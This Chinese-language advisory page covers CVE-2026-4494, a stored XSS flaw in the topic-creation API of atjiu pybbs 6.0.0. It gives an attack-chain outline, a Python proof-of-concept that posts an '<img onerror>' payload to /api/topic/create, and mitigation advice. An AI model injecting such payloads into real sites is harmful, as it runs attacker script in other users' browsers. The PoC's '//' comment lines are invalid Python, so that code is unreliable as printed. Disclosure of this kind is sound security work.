CVE-2026-4494 CVSS 3.5 低危

CVE-2026-4494: atjiu pybbs 跨站脚本漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4494

漏洞类型

跨站脚本 (XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

atjiu pybbs

漏洞概述

atjiu pybbs 6.0.0版本被发现存在跨站脚本漏洞（XSS）。该漏洞源于文件src/main/java/co/yiiu/pybbs/controller/api/TopicApiController.java中的create函数未正确处理用户输入。攻击者可远程利用此缺陷，通过构造特定请求注入恶意脚本。当其他用户浏览受影响页面时，脚本将被执行，可能导致信息泄露。目前该漏洞的利用代码已公开。

技术细节

该漏洞位于atjiu pybbs项目的TopicApiController控制器中，具体涉及create方法。该方法设计用于接收并处理用户创建新话题的请求，但在实现时缺乏对用户可控参数（如内容字段）的安全校验。攻击者可以利用低权限账户向系统提交包含恶意JavaScript代码的数据。由于后端未对数据进行HTML实体编码或过滤，当该数据被前端渲染展示给其他用户时，恶意脚本将在受害者浏览器中解析执行。根据CVSS 3.1向量，此漏洞攻击复杂度低，但需要用户交互（如点击链接）才能触发，主要影响系统的完整性，可能被用于钓鱼攻击或窃取Cookie。

攻击链分析

STEP 1

1. 侦察与准备

攻击者识别目标系统运行atjiu pybbs 6.0.0，并确认TopicApiController接口的存在。

STEP 2

2. 构造恶意载荷

攻击者编写包含恶意JavaScript代码的HTML标签，准备用于注入。

STEP 3

3. 发起攻击

攻击者利用低权限账户，向/api/topic/create接口发送包含恶意代码的POST请求。

STEP 4

4. 触发漏洞

当管理员或其他普通用户浏览被注入恶意脚本的话题页面时，脚本在浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept for CVE-2026-4494
// Target: atjiu pybbs 6.0.0
// Endpoint: /api/topic/create

import requests

def exploit_xss(target_url):
    # Malicious payload to execute JavaScript
    payload = {
        "title": "Interesting Topic",
        "content": "<img src=x onerror=alert('XSS')>", # Stored XSS payload
        "tags": "test"
    }
    
    try:
        # Send POST request to vulnerable endpoint
        response = requests.post(f"{target_url}/api/topic/create", data=payload)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print("[+] Check the created topic to verify the XSS trigger.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

# Usage
# exploit_xss("http://target-host")

影响范围

atjiu pybbs 6.0.0

防御指南

临时缓解措施

建议开发者立即检查TopicApiController.java文件中的create方法，确保所有用户输入在存储到数据库前都经过适当的转义处理。对于无法立即升级的用户，可以在输出层使用模板引擎的自动转义功能，或者部署内容安全策略（CSP）来限制脚本的执行来源，以此作为临时的缓解手段。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4494
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4494
3 Details https://www.cvedetails.com/cve/CVE-2026-4494/
4 VulDB https://vuldb.com/cve/CVE-2026-4494
5 Link https://fx4tqqfvdw4.feishu.cn/docx/EKVgdqWIzo70C0xB5jxcb4IZnre?from=from_copylink
6 Link https://vuldb.com/?ctiid.352020
7 Link https://vuldb.com/?id.352020
8 Link https://vuldb.com/?submit.773779

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表